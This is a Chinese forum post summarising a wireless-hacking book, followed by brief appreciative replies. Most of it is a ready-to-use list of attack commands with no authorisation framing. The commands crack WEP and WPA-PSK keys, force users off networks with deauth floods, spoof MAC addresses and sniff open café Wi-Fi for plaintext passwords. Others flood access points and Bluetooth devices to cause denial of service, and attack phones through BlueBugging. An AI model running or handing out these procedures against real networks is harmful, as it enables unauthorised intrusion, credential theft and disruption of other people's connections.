《无线黑客傻瓜书》读后总结
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。以下所有操作均在BackTrack 4中进行。
无线WEP加密P解:
注入P解:
ifconfig
ifconfig –a
ifconfig wlan0(无线网卡) up
airmon-ng start wlan0
airodump-ng mon0
airodump-ng --ivs –w ivsfile –c 频道 mon0或
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
aireplay-ng -3 –b BSSID –h Station mon0
aircrack-ng ivsfile-01.ivs
虚连接P解(适用于无客户端连接APP解)
ifconfig
ifconfig –a
ifconfig wlan0(无线网卡) up
airmon-ng start wlan0
airodump-ng mon0
airodump-ng --ivs –w ivsfile –c 频道 mon0或
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
aircrack-ng ivsfile-01.ivs
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
WPA-PSKP解
ifconfig
ifconfig –a
ifconfig wlan0(无线网卡) up
airmon-ng start wlan0
airodump-ng mon0
airodump-ng –w capfile –c 频道 mon0
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
aircrack-ng –w Dic capfile-01.cap或
cowpatty –f Dic –r capfile-01.cap –s SSID
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
傻瓜式P解软件SpoonWPA。
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
字典文件的生成和上传
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
BT4下开启Tftp:Services—TFTPD—start TFTPD
在Windows的CMD中运行 tftp –i IP put **.dic
BT4下开启SSH:Services—SSH—start SSH
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
AP限制MAC时的解决
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
ifconfig wlan0 hw ether NewMAC
关闭SSID广播的AP探测:
1. Deauth攻击:
airodump-ng mon0
aireplay-ng -0 10 –a BSSID –h Station mon0
2. 抓包分析
Omnipeek
Tcpdump –n –e –vvv –i 网卡名
3. 暴力P解
Charon 1.1暴力P解
无线加密数据包的解密
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
Filter:DNS DNS解析数据包
Filter:HTTP WEB访问数据包
Filter:msnms MSN
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
使用airdecap-ng解密:
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
咖啡馆中无线数据截取(开放式无加密AP)
1.Airodump-ng –w data –c频道 mon0
2.使用WireShark打开分析
BT4下的渗透工具:
nmap –sP IP/24 判断C段下存活的主机
nmap –vv –sS IP/24 –p Port 扫描指定端口是否开放
nmap –vv –sV IP –p port 指定端口的详细信息。。。
namp –O IP/24 判断主机的系统版本
GUI 版nmap:Zenmap
Amap使用:amap –B IP port
Nbtscan(扫描Windows网络NetBios信息):
nbtscan –v –s : IP/24
nbtscan –r IP
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
BruteSSH: ./bruthe.py –h IP –u Username –d Dic
Metasploit3使用
无线D.0.S
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
airmon-ng start wlan0
airodump-ng mon0
mdk3 mon0 a –a BSSID
对所有的AP攻击:mdk3 mon0 a
Deauth Flood 攻击
mdk3 mon0 d –c Channel
图形化D.O.S攻击:Charon
当受到攻击时,使用Wireshark抓包可以看到异常信息。
WPA-PSK高速P解
1. WPA-PSK PMK Hash TablesP解
Cowpatty –d HashTable.hash –r ***.cap –s SSID
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
2. GPU辅助高速P解
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
3. 分布式P解
AP的伪造
把AP的MAC改成目标AP的MAC
网卡软AP
伪造大量虚假AP信号:
随机SSID:mdk3 mon0 b –g –c 频道
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
War-Driving
热点地图绘制
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
Netstumble
蓝牙Hacking
Windows下的Blue Soleil工具
BT4:
hciconfig 查看蓝牙适配器
hciconfig hci0 up 载入蓝牙适配器
hciconfig hci0 class 蓝牙适配器详细信息
hcitool(扫描蓝牙)
hcitool –i hci0 scan
BTscanner(扫描蓝牙)
蓝牙攻击:
BlueBugging (适用于BlueTooth V1.1的手机)
Bluebugger工具:
Bulebugger –a HD_Addr info
BlueJacking
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
HD_Addr修改:
Bdaddr工具
bdaddr –i 蓝牙设备名 新HD_addr
蓝牙D.O.S
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
hciconfig
hciconfig hci0 up
hcitool –i hci0 scan
l2ping –s 10000 –目标MAC
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
./fang –r ************-############ -s
暴力P解************-############的蓝牙设备
./fang –l 各厂商BD_Addr分配
WifiZoo使用
./wifizoo.py –c Capfile
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情 传说中的沙发? 我还正在学习中,先收藏。 总结的很好~谢谢分享 分享成功的经验 呵 ....正在努力学习当中.... Exellent digest 谢谢看了! 谁有电子的。
借来看看。 LS的 估计不可能的 会被管理员和谐的
呵呵 其实也不贵 21块 快递再一点
我们也支持一下超级版主这么多年对我们的解答哈 回复有理,顶贴无罪 顶起~~~~~~~~~